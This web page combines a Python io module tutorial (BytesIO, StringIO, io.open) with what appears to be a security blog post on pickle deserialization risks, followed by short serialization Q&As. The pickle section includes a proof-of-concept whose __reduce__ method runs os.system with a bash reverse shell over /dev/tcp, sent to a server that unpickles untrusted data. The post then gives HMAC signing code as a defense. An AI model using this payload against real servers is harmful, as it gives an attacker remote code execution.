What is the process used to convert an object to a stream of bytes that can be saved in a file in Python?

The Python io module lets us manage file-related input and output operations. An advantage of the io module is that its classes and functions let us extend this functionality to read and write Unicode data.

Python IO Module

There are many ways in which we can use the io module to perform stream and buffer operations in Python. We will demonstrate a lot of examples here to prove the point. Let’s get started.

Python BytesIO

Just as we keep values in variables, we can keep data as bytes in an in-memory buffer by using the io module’s BytesIO class. Here is a sample program to demonstrate this:

    import io

    stream_str = io.BytesIO(b"JournalDev Python: \x00\x01")
    print(stream_str.getvalue())

The output for this program is:

    b'JournalDev Python: \x00\x01'

The getvalue() method returns the entire contents of the buffer as a bytes object, not as a string.
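As a further sketch, a BytesIO buffer can also be written to, rewound, and read in pieces, much like a file opened in binary mode. The variable names below are illustrative and not part of the original program.

```python
import io

# Start with an empty in-memory binary buffer
buffer = io.BytesIO()
buffer.write(b"JournalDev ")
buffer.write(b"Python")

# The position is now at the end, so rewind before reading
buffer.seek(0)
first_chunk = buffer.read(10)   # read the first 10 bytes
rest = buffer.read()            # read everything that remains

# getvalue() returns the full contents regardless of the current position
contents = buffer.getvalue()

print(first_chunk)
print(rest)
print(contents)
buffer.close()
```

Reading advances the position, while getvalue() ignores it, which is why the two are shown side by side here.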

Python StringIO

We can also use StringIO, which works much like BytesIO but holds text (str) rather than bytes. Here is a sample program:

    import io

    data = io.StringIO()
    data.write('JournalDev: ')
    print('Python.', file=data)
    print(data.getvalue())
    data.close()

The output for this program is:

    JournalDev: Python.

Notice that we closed the buffer once we were done with it. Closing frees the memory the buffer holds, since its data lives in memory. We also passed the buffer to print() through the optional file argument, which accepts any text stream.
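A minimal sketch of the same idea using a with block, which closes the buffer automatically. The names are illustrative; the point is that the contents must be copied out before the buffer closes.

```python
import io

with io.StringIO() as buffer:
    buffer.write('JournalDev: ')
    print('Python.', file=buffer)
    text = buffer.getvalue()   # copy the contents out before the buffer closes

print(text)
print(buffer.closed)

# Once closed, the buffer can no longer be read
try:
    buffer.getvalue()
except ValueError as error:
    print('Buffer is no longer usable:', error)
```

Using with avoids forgetting the close() call, at the cost of having to save the text inside the block.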

Reading using StringIO

Once we write some data to the StringIO buffer, we can read it as well. Let’s look at a code snippet:

    import io

    # Named "stream" rather than "input" to avoid shadowing the built-in input()
    stream = io.StringIO('This goes into the read buffer.')
    print(stream.read())

The output for this program is:

    This goes into the read buffer.

Reading a file using io.open()

It is also possible to read a file as bytes, for example to stream it over a network. The io module can open a media file such as an image in binary mode and return its contents as bytes. Here is a sample program:

    import io

    # buffering=0 disables buffering, which is only allowed in binary mode
    with io.open("whale.png", "rb", buffering=0) as file:
        print(file.read())

This program prints the raw bytes of the image file. For it to run, a whale.png image must be present in the current directory.

io.open() vs os.open()

The io.open() function is the preferred way to perform file I/O because it provides a high-level interface. It wraps the OS-level file descriptor in a file object that we can use in a Pythonic way. In Python 3, io.open() is an alias for the built-in open() function.

The os.open() function maps to the lower-level POSIX open() system call. It takes POSIX-style arguments and returns a file descriptor, an integer that represents the opened file. It does not return a file object, so the returned value has no read() or write() methods; we use os.read() and os.write() with the descriptor instead. Overall, io.open() can be thought of as a wrapper built on top of this lower-level call. With os.open() we must pass the flags (such as os.O_RDONLY) explicitly, along with an optional permission mode, while io.open() derives the low-level settings from the mode string passed to it, such as "r" or "rb".
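The difference can be sketched by reading the same file both ways. The temporary file and its contents are made up for the example.

```python
import io
import os
import tempfile

# Create a small throwaway file to read back (hypothetical sample data)
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b"hello io")
    path = tmp.name

# Low-level: os.open() returns an integer file descriptor
fd = os.open(path, os.O_RDONLY)
try:
    raw = os.read(fd, 100)
finally:
    os.close(fd)

# High-level: io.open() returns a file object with read()/write() methods
with io.open(path, "rb") as f:
    data = f.read()

os.remove(path)
print(type(fd).__name__, raw)
print(data)
```

Both calls return the same bytes; the file object simply takes care of the descriptor and of closing it.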

Conclusion

In this lesson, we studied simple operations of the Python io module and how to manage binary data with BytesIO and Unicode text with StringIO. If you are looking for complete file operations, such as deleting and copying a file, see the separate Python read file tutorial. Reference: API Doc

Posted on Tuesday, November 18, 2014

In Python, you can use pickle to serialize (deserialize) an object structure into (from) a byte stream. Here are best practices for secure Python pickling.

By Ashutosh Agrawal, senior consultant, and Arvind Balaji, associate consultant, Synopsys

Pickle in Python is primarily used for serializing and deserializing a Python object structure. In other words, it’s the process of converting a Python object into a byte stream to store it in a file or database, maintain program state across sessions, or transport data over the network. The pickled byte stream can be used to re-create the original object hierarchy by unpickling the stream. This whole process is similar to object serialization in Java or .NET.
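A minimal sketch of that round trip, saving an object to a file and loading it back. The sample dictionary and the file name state.pkl are hypothetical.

```python
import os
import pickle
import tempfile

# Hypothetical sample object: a nested structure of built-in types
state = {"user": "alice", "scores": [90, 85], "active": True}

path = os.path.join(tempfile.mkdtemp(), "state.pkl")

# Pickling: object -> byte stream written to a binary file
with open(path, "wb") as f:
    pickle.dump(state, f)

# Unpickling: byte stream read from the file -> equivalent object
# (only load pickle files that come from a trusted source)
with open(path, "rb") as f:
    restored = pickle.load(f)

print(restored == state)   # same contents
print(restored is state)   # but a separate object
```

The file must be opened in binary mode ("wb" and "rb") because a pickle is a byte stream, not text.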

When a byte stream is unpickled, the pickle module creates an instance of the original object first and then populates the instance with the correct data. To achieve this, the byte stream contains only the data specific to the original object instance, not the class definition itself. But the data alone is not sufficient. To successfully unpickle the object, the pickled byte stream also contains instructions that tell the unpickler how to reconstruct the original object structure, along with instruction operands, which help in populating that structure.
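The instructions and operands in a pickle can be inspected with the standard pickletools module. This is a small sketch with a made-up dictionary; the exact opcodes listed depend on the pickle protocol in use.

```python
import pickle
import pickletools

payload = pickle.dumps({"name": "whale", "size": 3})

# genops() walks the stream without executing it and yields
# (opcode, argument, position) for each instruction
opcode_names = []
for opcode, arg, position in pickletools.genops(payload):
    opcode_names.append(opcode.name)
    print(position, opcode.name, repr(arg))
```

Because genops() only parses the stream and never runs it, it is a safe way to look inside a pickle.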

According to the pickle module documentation, the following types can be pickled:

  • None, True, and False
  • Integers, long integers, floating point numbers, complex numbers
  • Normal and Unicode strings
  • Tuples, lists, sets, and dictionaries containing only picklable objects
  • Functions defined at the top level of a module
  • Built-in functions defined at the top level of a module
  • Classes that are defined at the top level of a module
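The list above can be probed with a quick sketch. The helper can_pickle() and the sample values are hypothetical, written only for this illustration.

```python
import pickle

def can_pickle(obj):
    """Return True if pickle.dumps() accepts obj, False otherwise."""
    try:
        pickle.dumps(obj)
        return True
    except (pickle.PicklingError, AttributeError, TypeError):
        return False

samples = {
    "None": None,
    "bool": True,
    "int": 42,
    "float": 3.14,
    "complex": 2 + 3j,
    "str": "text",
    "nested containers": {"a": [1, (2, 3), {4, 5}]},
    "built-in function": len,
    "lambda": lambda x: x,   # not reachable by name, so not picklable
}

results = {label: can_pickle(obj) for label, obj in samples.items()}
for label, ok in results.items():
    print(f"{label}: {ok}")
```

Functions and classes are pickled by reference to their name, which is why a lambda, having no importable name, is rejected.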

Pickle allows different objects to declare how they should be pickled using the __reduce__ method. Whenever an object is pickled, the __reduce__ method defined by it gets called. This method returns either a string, which may represent the name of a Python global, or a tuple describing how to reconstruct this object when unpickling.

Generally, the tuple consists of two elements:

  • A callable (which in most cases would be the name of the class to call)
  • Arguments to be passed to the above callable

The pickle library will pickle each component of the tuple separately, and will call the callable on the provided arguments to construct the new object during the process of unpickling.
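A harmless sketch of this mechanism: the illustrative class below (not from the original article) returns the built-in sorted() as its callable, so unpickling yields whatever sorted() returns rather than an instance of the class.

```python
import pickle

class SortedOnLoad:
    """Illustrative class whose pickle says: call sorted(values) on load."""

    def __init__(self, values):
        self.values = values

    def __reduce__(self):
        # (callable, args): the unpickler will call sorted(self.values)
        return (sorted, (self.values,))

stream = pickle.dumps(SortedOnLoad([3, 1, 2]))
result = pickle.loads(stream)

print(type(result).__name__, result)
```

The unpickler calls the named callable without checking what it is, which is exactly the behavior that makes untrusted pickles dangerous.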

Dangers of Python pickling

Since there are no effective ways to verify the pickle stream being unpickled, it is possible to provide malicious shell code as input, causing remote code execution. The most common attack scenario leading to this would be to trust raw pickle data received over the network. If the connection is unencrypted, the pickle received could have also been modified on the wire. Another attack scenario is when an attacker can access and modify the stored pickle files from caches, file systems, or databases.

The following example code demonstrates a simple client-server program. The server binds to a particular port and waits for a client to send data. Once it receives the data, it unpickles it.

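    # Inside a server method (pickle imported at module level)
    conn, addr = self.receiver_socket.accept()
    data = conn.recv(1024)
    # Unsafe: unpickles whatever bytes the client sent
    return pickle.loads(data)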

If the client is not trusted, an attacker can get remote code to execute on the server and gain access to it.

    import os
    import pickle
    import socket

    class Shell_code(object):
        def __reduce__(self):
            # On unpickling, the server calls os.system() with this command
            return (os.system, ('/bin/bash -i >& /dev/tcp/"Client IP"/"Listening PORT" 0>&1',))

    shell = pickle.dumps(Shell_code())
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client_socket.connect(('Server IP', 'Server PORT'))
    client_socket.send(shell)

Best practices in pickle

The pickle module is not inherently insecure. The following best practices allow safe implementation of pickle.

  • An untrusted client or an untrusted server can cause remote code execution. Thus pickle should never be used between unknown parties.
  • Ensure the parties exchanging pickle have an encrypted network connection. This prevents alteration or replay of data on the wire.
  • If having a secure connection is not possible, any alteration in pickle can be verified by using a cryptographic signature. Pickle can be signed before storage or transmission, and its signature can be verified before loading it on the receiver side.
  • In scenarios where the pickle data is stored, review file system permissions and ensure protected access to the data.

The following example code demonstrates cryptographic signature and verification. The cryptographic signature, as mentioned above, helps in detecting any alteration of pickled data. The client uses HMAC to sign the data. It sends the digest value along with the pickled data to the server as shown below.

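    import hashlib
    import hmac
    import pickle

    pickled_data = pickle.dumps(data)
    # The key and the message must both be bytes
    digest = hmac.new(b'shared-key', pickled_data, hashlib.sha1).hexdigest()
    # Send "<hex digest> <pickle bytes>"
    conn.send(digest.encode('ascii') + b' ' + pickled_data)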

The server receives the data, computes the digest, and verifies it with the one that was sent.

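    conn, addr = self.receiver_socket.accept()
    data = conn.recv(1024)
    # Split on the first space only; the pickle payload may itself contain spaces
    recvd_digest, pickled_data = data.split(b' ', 1)
    new_digest = hmac.new(b'shared-key', pickled_data, hashlib.sha1).hexdigest()
    # compare_digest() compares in constant time
    if not hmac.compare_digest(recvd_digest, new_digest.encode('ascii')):
        print('Integrity check failed')
    else:
        unpickled_data = pickle.loads(pickled_data)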
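The signing and verification steps can also be tried without sockets. This is a self-contained sketch, not the authors' implementation: the helper names sign() and verify_and_load() are hypothetical, the key is a placeholder, and SHA-256 is swapped in for the SHA-1 used above.

```python
import hashlib
import hmac
import pickle

SHARED_KEY = b"shared-key"   # placeholder; use a strong secret in practice

def sign(obj):
    """Return b'<hex digest> <pickle bytes>' for obj."""
    pickled = pickle.dumps(obj)
    digest = hmac.new(SHARED_KEY, pickled, hashlib.sha256).hexdigest()
    return digest.encode("ascii") + b" " + pickled

def verify_and_load(message):
    """Unpickle only if the digest matches; raise ValueError otherwise."""
    received_digest, pickled = message.split(b" ", 1)
    expected = hmac.new(SHARED_KEY, pickled, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(received_digest, expected.encode("ascii")):
        raise ValueError("Integrity check failed")
    return pickle.loads(pickled)

message = sign({"id": 7, "tags": ["a", "b"]})
loaded = verify_and_load(message)
print(loaded)

# Flip one bit in the payload to simulate tampering on the wire
tampered = message[:-1] + bytes([message[-1] ^ 1])
try:
    verify_and_load(tampered)
    tamper_detected = False
except ValueError:
    tamper_detected = True
print(tamper_detected)
```

The digest is checked before pickle.loads() is ever called, so a modified payload is rejected without being executed.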

Ashutosh Agrawal is an associate managing consultant at Synopsys. Over the last nine years, he has performed and led a wide variety of application security assessments including penetration tests, secure code reviews, and threat modeling projects. He has deployed static analysis tools, developed SSDLC policies and standards, and has delivered several instructor-led training courses. Ashutosh possesses extensive project management experience as a key member of Synopsys' strategic Software Security In-a-Box and BSIMM initiatives. Ashutosh has a Master's in Computer Science from the University of Southern California and is currently based in Washington DC. In his spare time, he loves to teach Hindi to students via Google Hangout.

What is the process in which a byte stream is converted into an object?

Deserialization, or unpickling, is the inverse of pickling: a byte stream is converted back into a Python object.

Can you pickle an object in Python?

Python comes with a built-in module, pickle, that performs pickling and unpickling. Pickling and unpickling are the conversion of objects into byte streams and back again, that is, serialization and deserialization using Python's pickle module.

What is the process of transforming data or an object in memory (RAM) into a stream of bytes called?

Serialization is the process of transforming data or an object in memory (RAM) into a stream of bytes, called a byte stream. A byte stream can then be stored in a binary file on disk, saved in a database, or sent over a network.
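Since a byte stream does not have to live in a file, the same serialization can target an in-memory io.BytesIO buffer. This is a minimal sketch with a made-up sample object.

```python
import io
import pickle

record = ("whale", 3, [1.5, 2.5])   # hypothetical sample object

# Serialize into an in-memory byte stream instead of a file on disk
stream = io.BytesIO()
pickle.dump(record, stream)
raw_bytes = stream.getvalue()

# Rewind and deserialize from the same stream
stream.seek(0)
restored = pickle.load(stream)

print(type(raw_bytes).__name__, len(raw_bytes) > 0)
print(restored == record)
```

The resulting bytes object is what would be written to disk, stored in a database column, or sent over a socket.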